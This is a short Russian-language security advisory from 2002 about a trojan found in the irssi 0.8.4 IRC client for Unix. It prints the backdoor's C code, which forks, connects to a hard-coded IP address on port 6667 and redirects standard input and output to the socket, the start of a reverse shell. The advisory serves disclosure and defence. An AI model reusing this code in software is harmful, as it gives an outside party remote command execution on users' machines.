Security Lab

Троян в популярном IRC клиенте для Unix

Дата публикации:28.05.2002
Всего просмотров:1153
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: rssi - свободно доступный irc клиент для Linux и Unix систем.

Код программы содержит троян, который позволяет пользователю с IP адресом 204.120.36.206 удаленно выполнять команды на хосте, на котором установлен irssi (через 6667 порт). Зараженная версия была доступна для загрузки с начала апреля до конца мая.

Уязвимость обнаружена в irssi 0.8.4

Уязвимый код:
int s;
struct sockaddr_in sa;
switch(fork()) { case 0: break; default: exit(0); }
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
exit(1);
}
/* HP/UX 9 (%@#!) writes to sscanf strings */
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("204.120.36.206");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
exit(1);
}
dup2(s, 0); dup2(s, 1); dup2(s, 2);


 
Ссылки: irssi backdoored.